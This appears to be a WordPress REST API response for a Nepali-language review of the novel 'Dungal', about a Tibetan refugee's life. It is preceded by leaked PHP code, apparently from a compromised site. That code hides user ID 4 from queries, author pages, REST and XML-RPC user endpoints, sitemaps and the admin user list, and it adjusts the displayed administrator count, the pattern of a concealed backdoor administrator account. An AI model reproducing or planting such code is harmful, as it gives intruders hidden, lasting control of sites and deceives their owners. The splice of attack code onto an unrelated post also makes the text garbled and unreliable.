add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 4;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 4;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 4;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 4;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 4;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-4{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
{"id":704,"date":"2024-09-27T15:43:25","date_gmt":"2024-09-27T15:43:25","guid":{"rendered":"http:\/\/heramba.com.np\/?p=704"},"modified":"2024-09-27T15:43:26","modified_gmt":"2024-09-27T15:43:26","slug":"%e0%a4%a6%e0%a5%81%e0%a4%99%e0%a4%be%e0%a4%b2-%e0%a4%89%e0%a4%aa%e0%a4%a8%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%b8%e0%a4%95%e0%a5%8b-%e0%a4%aa%e0%a4%be%e0%a4%a0%e0%a4%95%e0%a5%80%e0%a4%af-%e0%a4%85","status":"publish","type":"post","link":"https:\/\/heramba.com.np\/?p=704","title":{"rendered":"\u0926\u0941\u0919\u093e\u0932 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u0915\u094b \u092a\u093e\u0920\u0915\u0940\u092f \u0905\u0928\u0941\u092d\u0942\u0924\u093f"},"content":{"rendered":"<div style=\"margin-top: 0px; margin-bottom: 0px;\" class=\"sharethis-inline-share-buttons\" ><\/div>\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"662\" height=\"1024\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2024\/09\/242838033_4368037953288043_2040705900942657152_n-662x1024.jpg\" alt=\"\" class=\"wp-image-705\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2024\/09\/242838033_4368037953288043_2040705900942657152_n-662x1024.jpg 662w, https:\/\/heramba.com.np\/wp-content\/uploads\/2024\/09\/242838033_4368037953288043_2040705900942657152_n-194x300.jpg 194w, https:\/\/heramba.com.np\/wp-content\/uploads\/2024\/09\/242838033_4368037953288043_2040705900942657152_n-768x1188.jpg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2024\/09\/242838033_4368037953288043_2040705900942657152_n-993x1536.jpg 993w, https:\/\/heramba.com.np\/wp-content\/uploads\/2024\/09\/242838033_4368037953288043_2040705900942657152_n.jpg 1303w\" sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u0926\u0941\u0919\u093e\u0932 (\u092a\u0940\u0930, \u0926\u0941:\u0916, \u092a\u0940\u0921\u093e) \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u092e\u093e \u092e\u093e\u091f\u094b \u0917\u0941\u092e\u093e\u0909\u0928\u0941\u092a\u0930\u0947\u0915\u094b \u0930 \u0905\u0928\u093e\u0917\u0930\u093f\u0915 \u092d\u090f\u0930 \u091c\u0940\u0935\u0928 \u092c\u093f\u0924\u093e\u0909\u0928\u0941 \u092a\u0930\u094d\u0926\u093e\u0915\u094b \u092a\u0940\u0921\u093e \u0905\u092d\u093f\u0935\u094d\u092f\u0915\u094d\u0924 \u091b \u0964 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u0915\u094b \u0938\u092e\u0917\u094d\u0930 \u0915\u0925\u093e \u090f\u0915 \u0924\u093f\u092c\u094d\u092c\u0924\u0940 \u0936\u0930\u0923\u093e\u0930\u094d\u0925\u0940 \u092f\u0941\u0935\u0924\u0940 \u0915\u093e\u0930\u094d\u091a\u0941\u0919\u0932\u0947 \u0928\u0947\u092a\u093e\u0932\u0940 \u092f\u0941\u0935\u0915 \u0935\u093f\u0936\u094d\u0935\u0926\u0940\u092a\u0932\u093e\u0908 \u0938\u0902\u0935\u094b\u0927\u0928 \u0917\u0930\u0940 \u092d\u0928\u0947\u0915\u094b \u0936\u0948\u0932\u0940\u092e\u093e \u0932\u0947\u0916\u093f\u090f\u0915\u094b \u091b \u0964 \u092a\u0924\u094d\u0930\u093e\u0924\u094d\u092e\u0915 \u0936\u0948\u0932\u0940\u092e\u093e \u0932\u0947\u0916\u093f\u090f\u0915\u094b \u092f\u0938 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u092e\u093e \u0915\u093e\u0930\u094d\u091a\u0941\u0919 \u0906\u092b\u0948\u0901\u0932\u0947 \u0905\u0927\u093f\u0915\u093e\u0902\u0936 \u0905\u0928\u0941\u092d\u0942\u0924\u093f \u0935\u094d\u092f\u0915\u094d\u0924 \u0917\u0930\u0947\u0915\u0940 \u091b\u0928\u094d \u0964 \u0932\u0947\u0916\u0915\u0932\u0947 \u0936\u0930\u0923\u093e\u0930\u094d\u0925\u0940 \u0936\u093f\u0935\u093f\u0930\u092e\u093e \u091c\u0928\u094d\u092e\u0947\u0930 \u0939\u0941\u0930\u094d\u0915\u0947\u0915\u0940 \u0915\u093e\u0930\u094d\u091a\u0941\u0919\u0932\u0947 \u092a\u0930\u0926\u0947\u0936\u092e\u093e \u0928\u093e\u0917\u0930\u093f\u0915\u0924\u093e \u0930 \u0936\u0930\u0923\u093e\u0930\u094d\u0925\u0940 \u092a\u0930\u093f\u091a\u092f\u092a\u0924\u094d\u0930\u0938\u092e\u0947\u0924 \u0928\u092a\u093e\u090f\u0930 \u092d\u094b\u0917\u094d\u0928\u0941 \u092a\u0930\u0947\u0915\u094b \u0926\u0948\u0928\u0928\u094d\u0926\u093f\u0928 \u0938\u092e\u0938\u094d\u092f\u093e \u0930 \u092e\u0939\u0938\u0941\u0938 \u0917\u0930\u094d\u0928\u0941\u092a\u0930\u0947\u0915\u094b \u092a\u0940\u0921\u093e , \u091b\u093f\u092e\u0947\u0915\u0940\u0939\u0930\u0942\u092c\u093e\u091f \u092d\u0947\u0917\u094d\u0928\u0941\u092a\u0930\u0947\u0915\u094b \u0905\u0935\u0939\u0947\u0932\u0928\u093e \u0905\u0928\u0941\u092d\u0942\u0924\u093f\u0915\u093e \u0930\u0942\u092a\u092e\u093e \u0905\u092d\u093f\u0935\u094d\u092f\u0915\u094d\u0924 \u0917\u0930\u093e\u090f\u0915\u093e \u091b\u0928\u094d \u092d\u0928\u0947 \u0905\u0930\u094d\u0915\u093e\u0924\u093f\u0930 \u091a\u093f\u0928\u093f\u092f\u093e\u0939\u0930\u0942\u0915\u094b \u092c\u0940\u092d\u0924\u094d\u0938 \u0906\u0915\u094d\u0930\u092e\u0923\u0915\u093e \u092a\u094d\u0930\u0924\u094d\u092f\u0915\u094d\u0937 \u092d\u094b\u0915\u094d\u0924\u093e \u0930 \u0938\u093e\u0915\u094d\u0937\u0940 \u092c\u0928\u0947\u0930 \u0906\u092b\u094d\u0928\u094b \u0925\u093e\u0924\u0925\u0932\u094b \u0930 \u0906\u092b\u0928\u094d\u0924 \u091b\u093e\u0921\u0947\u0930 \u0906\u090f\u0915\u093e \u092a\u0939\u093f\u0932\u094b \u092a\u0941\u0938\u094d\u0924\u093e\u0915\u093e \u092a\u093e\u0924\u094d\u0930\u0939\u0930\u0942( \u0921\u094b\u0932\u094d\u092e\u093e \u0906\u0926\u093f ..)\u0915\u094b \u0905\u0928\u0941\u092d\u0942\u0924\u093f\u0932\u093e\u0908 \u092a\u0928\u093f \u091c\u0940\u0935\u0928\u094d\u0924 \u0930\u0942\u092a\u092e\u093e \u0909\u0924\u093e\u0930\u0947\u0930 \u0915\u093e\u0930\u094d\u091a\u0941\u0919\u092e\u093e\u0930\u094d\u092b\u0924 \u092d\u0928\u093e\u090f\u0915\u093e \u091b\u0928\u094d \u0964 \u0924\u0928 \u0930 \u092e\u0928\u092e\u093e \u0905\u0938\u0919\u094d\u0916\u094d\u092f \u0918\u093e\u0909\u091a\u094b\u091f \u092c\u094b\u0915\u0947\u0930 \u0928\u0947\u092a\u093e\u0932 \u0906\u0907\u092a\u0941\u0917\u094d\u0926\u093e \u092a\u0928\u093f \u0924\u093f\u092c\u094d\u092c\u0924\u0940 \u0936\u0930\u0923\u093e\u0930\u094d\u0925\u0940\u0915\u093e \u0926\u0941:\u0916 \u0930 \u0915\u0937\u094d\u091f \u0909\u0938\u094d\u0924\u0948 \u091b\u0928\u094d \u0964 \u092f\u0938\u094d\u0924\u093e \u0905\u0925\u093e\u0939 \u092a\u0940\u0921\u093e\u0915\u093e \u092c\u093f\u091a \u090f\u0915 \u092f\u0941\u0935\u0924\u0940\u0932\u0947 \u0917\u0930\u0947\u0915\u094b \u0905\u0938\u093e\u0927\u093e\u0930\u0923 \u092a\u094d\u0930\u0947\u092e\u0915\u094b \u0917\u093e\u0925\u093e \u092f\u0938 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u092e\u093e \u092a\u0922\u094d\u0928 \u092a\u093e\u0907\u0928\u094d\u091b \u0964 \u092f\u094b \u0909\u092a\u0928\u094d\u092f\u093e\u0938 \u0926\u0936\u0915\u094c\u0902\u0926\u0947\u0916\u093f \u0906\u092b\u094d\u0928\u094b \u092e\u093e\u091f\u094b \u0930 \u092a\u0930\u093f\u091a\u092f \u0916\u094b\u091c\u094d\u0926\u0948 \u092d\u094c\u0901\u0924\u093e\u0930\u093f\u0907\u0930\u0939\u0947\u0915\u093e \u0905\u0928\u093e\u0917\u0930\u093f\u0915\u0939\u0930\u0942\u0915\u094b \u0906\u0930\u094d\u0924\u0928\u093e\u0926 \u092c\u094b\u0915\u0947\u0930 \u0906\u090f\u0915\u094b \u091b \u0964 \u0905\u0928\u0947\u0915 \u092a\u0940\u0921\u093e \u0938\u0939\u0926\u0948 \u0905\u0918\u093f \u092c\u0922\u094d\u0928 \u0938\u0939\u0928\u0936\u0940\u0932\u0924\u093e\u0915\u094b \u0926\u0930\u094d\u0936\u0928\u0915\u093e \u0930\u0942\u092a\u092e\u093e \u092c\u0941\u0926\u094d\u0927 \u0926\u0930\u094d\u0936\u0928\u0932\u093e\u0908 \u0906\u0924\u094d\u092e\u0938\u093e\u0924 \u0917\u0930\u093f\u090f\u0915\u094b \u092f\u0938 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u092e\u093e \u092a\u094d\u0930\u0947\u092e \u0930 \u0935\u093f\u092f\u094b\u0917\u0915\u093e \u0918\u091f\u0928\u093e, \u091c\u0940\u0935\u0928\u0915\u093e \u0905\u0938\u092b\u0932 \u092f\u093e\u0924\u094d\u0930\u093e \u0930 \u0924\u094d\u092f\u0938\u094d\u0924\u093e \u092a\u0930\u093f\u0935\u0947\u0936\u092c\u093e\u091f \u092a\u093e\u0907\u0928\u0947 \u092e\u093e\u0928\u0935\u0924\u093e \u0930 \u091c\u0940\u0935\u0928\u0915\u093e \u0932\u093e\u0917\u093f \u0906\u0935\u0936\u094d\u092f\u0915 \u091c\u094d\u091e\u093e\u0928\u0915\u093e \u091a\u093e\u0916\u0932\u093e\u0917\u094d\u0926\u093e \u092a\u094d\u0930\u0938\u0919\u094d\u0917 \u092a\u0922\u094d\u0928 \u092a\u093e\u0907\u0928\u094d\u091b \u0964 \u0915\u093e\u0930\u094d\u091a\u0941\u0919\u0932\u0947 \u0939\u0943\u0926\u092f\u0926\u0947\u0916\u093f \u092a\u094d\u0930\u0947\u092e \u0917\u0930\u0947\u0930 \u092a\u091b\u094d\u092f\u093e\u090f\u0915\u094b \u0935\u093f\u0936\u094d\u0926\u0940\u092a \u092c\u093f\u091a\u092c\u093f\u091a\u092e\u093e \u091d\u0932\u094d\u092f\u093e\u0915\u091d\u0941\u0932\u0941\u0915 \u0926\u0947\u0916\u093f\u090f\u092a\u0928\u093f \u0938\u0918\u0928 \u0938\u0902\u0935\u093e\u0926\u092e\u093e \u092a\u094d\u0930\u0938\u094d\u0924\u0941\u0924 \u0939\u0941\u0926\u0948\u0928 \u0964 \u0905\u092c \u0915\u0947 \u0939\u094b\u0932\u093e \u092d\u0928\u094d\u0928\u0947 \u0939\u0941\u091f\u094d\u0939\u0941\u091f\u0940\u0932\u0947 \u0909\u092a\u0928\u094d\u092f\u093e\u0938 \u092a\u0922\u093f\u0938\u0915\u093f\u090f\u0915\u094b \u092a\u0924\u094d\u0924\u0948 \u0939\u0941\u0926\u0948\u0928 \u0964<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0926\u0941\u0919\u093e\u0932 (\u092a\u0940\u0930, \u0926\u0941:\u0916, \u092a\u0940\u0921\u093e) \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u092e\u093e \u092e\u093e\u091f\u094b \u0917\u0941\u092e\u093e\u0909\u0928\u0941\u092a\u0930\u0947\u0915\u094b \u0930 \u0905\u0928\u093e\u0917\u0930\u093f\u0915 \u092d\u090f\u0930 \u091c\u0940\u0935\u0928 \u092c\u093f\u0924\u093e\u0909\u0928\u0941 \u092a\u0930\u094d\u0926\u093e\u0915\u094b \u092a\u0940\u0921\u093e \u0905\u092d\u093f\u0935\u094d\u092f\u0915\u094d\u0924 \u091b \u0964 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u0915\u094b \u0938\u092e\u0917\u094d\u0930 \u0915\u0925\u093e \u090f\u0915 \u0924\u093f\u092c\u094d\u092c\u0924\u0940 \u0936\u0930\u0923\u093e\u0930\u094d\u0925\u0940 \u092f\u0941\u0935\u0924\u0940 \u0915\u093e\u0930\u094d\u091a\u0941\u0919\u0932\u0947 \u0928\u0947\u092a\u093e\u0932\u0940 \u092f\u0941\u0935\u0915 \u0935\u093f\u0936\u094d\u0935\u0926\u0940\u092a\u0932\u093e\u0908 \u0938\u0902\u0935\u094b\u0927\u0928 \u0917\u0930\u0940 \u092d\u0928\u0947\u0915\u094b \u0936\u0948\u0932\u0940\u092e\u093e \u0932\u0947\u0916\u093f\u090f\u0915\u094b \u091b \u0964 \u092a\u0924\u094d\u0930\u093e\u0924\u094d\u092e\u0915 \u0936\u0948\u0932\u0940\u092e\u093e \u0932\u0947\u0916\u093f\u090f\u0915\u094b \u092f\u0938 \u0909\u092a\u0928\u094d\u092f\u093e\u0938\u092e\u093e \u0915\u093e\u0930\u094d\u091a\u0941\u0919 \u0906\u092b\u0948\u0901\u0932\u0947 \u0905\u0927\u093f\u0915\u093e\u0902\u0936 \u0905\u0928\u0941\u092d\u0942\u0924\u093f \u0935\u094d\u092f\u0915\u094d\u0924 \u0917\u0930\u0947\u0915\u0940 \u091b\u0928\u094d \u0964 \u0932\u0947\u0916\u0915\u0932\u0947 \u0936\u0930\u0923\u093e\u0930\u094d\u0925\u0940 \u0936\u093f\u0935\u093f\u0930\u092e\u093e \u091c\u0928\u094d\u092e\u0947\u0930 \u0939\u0941\u0930\u094d\u0915\u0947\u0915\u0940 \u0915\u093e\u0930\u094d\u091a\u0941\u0919\u0932\u0947 \u092a\u0930\u0926\u0947\u0936\u092e\u093e [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-704","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/704","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=704"}],"version-history":[{"count":1,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/704\/revisions"}],"predecessor-version":[{"id":706,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/704\/revisions\/706"}],"wp:attachment":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}